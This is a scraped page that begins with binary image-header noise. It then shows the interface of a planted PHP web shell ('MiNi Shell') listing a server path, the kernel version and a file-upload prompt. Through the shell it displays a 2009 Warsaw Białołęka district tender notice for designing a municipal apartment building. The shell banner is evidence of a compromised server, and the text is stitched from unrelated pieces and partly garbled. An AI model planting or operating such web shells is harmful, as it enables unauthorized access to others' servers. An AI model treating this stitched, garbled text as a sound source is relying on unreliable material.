JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148164-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie kompleksowej wielobranżowej dokumentacji projektowo-budowlanej, wykonawczej i kosztorysowej na budowę budynku komunalnego przy ul. Marywilskiej w Warszawie.</b><br>
<b>Numer ogłoszenia: 148164 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dzielnica Białołęka m. st. Warszawy , ul. Modlińska 197/232, 03-122 Warszawa, woj. mazowieckie, tel. 022 5103125, faks 022 5103189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialoleka.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej wielobranżowej dokumentacji projektowo-budowlanej, wykonawczej i kosztorysowej na budowę budynku komunalnego przy ul. Marywilskiej w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompleksowej wielobranżowej dokumentacji projektowej budowlanej, wykonawczej i kosztorysowej na budowę budynku mieszkalnego wielorodzinnego komunalnego wraz z infrastrukturą techniczną niezbędną do funkcjonowania obiektu, przekładkami sieci kolidującymi z przedmiotową inwestycją oraz zagospodarowaniem terenu dla I-go budynku komunalnego, z obsługą komunikacyjną, wymaganą małą architekturą. i rezerwą terenu dla II-go analogicznego budynku przy ul. Marywilskiej w Warszawie. 

Przedmiot zamówienia będzie obejmował:
1. Projekt zagospodarowania terenu dla I-go budynku komunalnego z pozostawieniem rezerwy terenowej dla II-go budynku.
2. Kompleksową wielobranżową dokumentację budowlaną i wykonawczą na budowę pierwszego budynku mieszkalnego wielorodzinnego komunalnego z usługami w parterze i garażem podziemnym wraz z wjazdem na działkę, infrastrukturą techniczną niezbędną do funkcjonowania obiektu, przekładkami sieci kolidującymi z przedmiotową inwestycją oraz zagospodarowaniem terenu.
3.  Zakłada się ilość kondygnacji nadziemnych 6 w tym 5 kondygnacji mieszkalnych, 1 kondygnację usługowo-handlową w parterze i garaż podziemny.
W obiekcie należy przewidzieć następującą strukturę lokali:
a)	50 lokali jednopokojowych -  wariant I (1p + k),
b)	30 lokali dwupokojowych  -  wariant II (2p + k),
c)	lokale usługowo-handlowe w parterze z niezbędnym wyposażeniem sanitarnym i technologicznym.
W ramach kondygnacji handlowej należy zaprojektować nw. pomieszczenia z wymaganym wyposażeniem technologicznym instalacjami, wentylacją i zapleczem socjalnym i sanitarnym:
1.	Klub Integracji Społecznej i Samopomocy  - ok. 134 m2:
a) sala konferencyjna ok. 70 m2 w tym 10 m2 pomieszczenie przeznaczone na szatnie,
b) pokój biurowy ok. 15 m2,
c) zaplecze kuchenne ok. 15 m2,
d) magazyn ok. 10 m2,
e) pokój socjalny ok. 8 m2,
f) dwie (2) toalety: dla pracowników ok. 6 m2, dla klientów ok. 10 m2 (dostosowana do potrzeb dla osób niepełnosprawnych) 
2.	Lokal dla Administracji budynku:
a) pokój biurowy dla 2 - 3 osób, 
b) pokój obsługi interesantów,
c) przebieralnia, szatnia,
d) magazynek podręczny,
e) zaplecze socjalno-sanitarne z natryskiem,
3.	Dwa (2) lokale handlowo-usługowe o pow. ok. 100 m2 każdy z zapleczem socjalno-sanitarnym do późniejszego wynajęcia,
4.	Lokale handlowo-usługowe o pow. ok. 50 m2 każdy - wynikowo na pozostałej powierzchni parteru z wymaganym zapleczem socjalno-sanitarnym do późniejszego wynajęcia.
Lokale handlowe należy zaprojektować w sposób umożliwiający ewentualne późniejsze łączenie lokali ze sobą (układ konstrukcyjny parteru słupowy, szkieletowy).
Inne pomieszczenia wynikające z funkcji i technologii niezbędne dla prawidłowego zrealizowania i eksploatacji budynku,
Wyposażenie technologiczne w pomieszczeniach kuchni, łazienkach i pomieszczeniach usługowych zgodnie z ich przeznaczeniem,
Szczegółowy zakres prac projektowych zawarto w:
-   Opisie przedmiotu zamówienia - załącznik nr 5 do SIWZ ; zał. nr 5 do umowy,
-  Założeniach do programu funkcjonalno-użytkowego - załącznik nr 1 do   Opisu przedmiotu zamówienia,
-    Mapa sytuacyjna oraz decyzja o warunkach zabudowy - załącznik nr 8 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	Wykonawca musi spełniać warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2007r., nr 223, poz. 1655).
2.	Wykonawca musi wykazać się należytym wykonaniem w okresie ostatnich 3-ch lat przed dniem wszczęcia postępowania o udzielanie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej, odpowiadającej swoim rodzajem i wartością usługi stanowiącej przedmiot zamówienia, tzn. kompleksowej wielobranżowej dokumentacji projektowej budowlanej, wykonawczej i kosztorysowej budynku mieszkalnego lub niemieszkalnego o powierzchni całkowitej nie mniejszej niż 5 000 m2 zaliczających się wg Polskiej Klasyfikacji Obiektów Budowlanych do klasy:
- Sekcja 1; Dział 11, 12; Grupa 112; 113, 121, 122, Klasa 1122, 1130, 1211, 1220 w części niżej wymienionej: 
a)	Budynki o trzech i więcej mieszkaniach 
Klasa obejmuje:
- Budynki mieszkalne pozostałe, takie jak: budynki mieszkalne, o trzech i więcej mieszkaniach.
b)	Budynki zbiorowego zamieszkania:
Klasa obejmuje: 
- Budynki zbiorowego zamieszkania, w tym domy mieszkalne dla ludzi starszych, studentów, dzieci i innych grup społecznych, np. domy opieki społecznej, hotele robotnicze, internaty i bursy szkolne, domy studenckie; domy dziecka, domy dla bezdomnych itp. 
- Budynki mieszkalne na terenie koszar, 
- Budynki rezydencji prezydenckich i biskupich.
c)	Budynki hoteli
Klasa obejmuje:
- Hotele, motele, gospody, pensjonaty i podobne budynki oferujące zakwaterowanie,  
  z restauracjami lub bez,
- Samodzielne restauracje i bary.
d)	Budynki biurowe
Klasa obejmuje:
- Budynki wykorzystywane jako miejsce pracy dla działalności biura, sekretariatu lub innych o charakterze administracyjnym np. budynki banków, urzędów pocztowych, urzędów miejskich, gminnych, ministerstw, itp. lokali administracyjnych;
- Budynki centrów konferencyjnych i kongresów, sądów i parlamentów.

Warunek, o którym mowa powyżej, musi być udokumentowany w wykazie zrealizowanych dokumentacji projektowych wg załącznika nr 4 z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie.   
3.	Wykonawca musi wykazać posiadanie w banku lub spółdzielczej kasie oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, środków finansowych lub zdolności kredytowej wykonawcy w kwocie nie mniejszej niż 100 000,00 zł (słownie: sto tysięcy złotych).
4.	Wykonawca musi wykazać, że dysponuje lub będzie dysponował co najmniej 1 projektantem w branży: architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej i drogowej, którzy będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności i posiadających uprawnienia do projektowania oraz posiadających aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego zgodnie z art. 12 ustawy z dnia 7 lipca Prawo budowlane (Dz. U. z 2006r. nr 156, poz. 1118 - tekst jedn. ze zm.).

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o dokumenty złożone wraz z ofertą zgodnie z SIWZ, według formuły spełnia - nie spełnia. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wymienione w Specyfikacji warunki udziału w postępowaniu, wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków; 
b)	oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust.1 pkt 1 - 3 ustawy - wg wzoru stanowiącego załącznik nr 2 do SIWZ;
c)	oświadczenie Wykonawcy o nie podleganiu wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1 i 2 oraz spełnianiu wymogów art. 22 ust. 1 pkt  4 ustawy, wg wzoru stanowiącego załącznik nr 3 do SIWZ;
d)	wykaz wykonanych usług, a w przypadku świadczenia okresowych lub ciągłych również wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi były wykonane należycie ( np. referencje ) - załącznik nr 4 do SIWZ;
e)	wykaz osób zespołu projektowego, który będzie realizował zamówienie posiadających odpowiednie kwalifikacje do wykonania zamówienia tj. posiadających uprawnienia do projektowania oraz aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego zgodnie z art. 12 ustawy z dnia 7 lipca Prawo budowlane (Dz. U. z 2006r. nr 156, poz. 1118 - tekst jedn. ze zm.) w branży architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej i drogowej - - załącznik nr 7 do SIWZ;
f)	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt e) wykonawca wskazał osoby, którymi będzie dysponował;
g)	informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie nie mniejszej niż 100 000,00 zł. (słownie: sto tysięcy złotych), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Funkcjonalność - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bialoleka.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych, ul. Modlińska 197, wejście C, II p., pok. 232A, 03-122 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 12:00, miejsce: Urząd Dzielnicy Białołęka, Wydział Zamówień Publicznych, ul. Modlińska 197, wejście C, II p., pok. 232A, 03-122 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 04.07.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com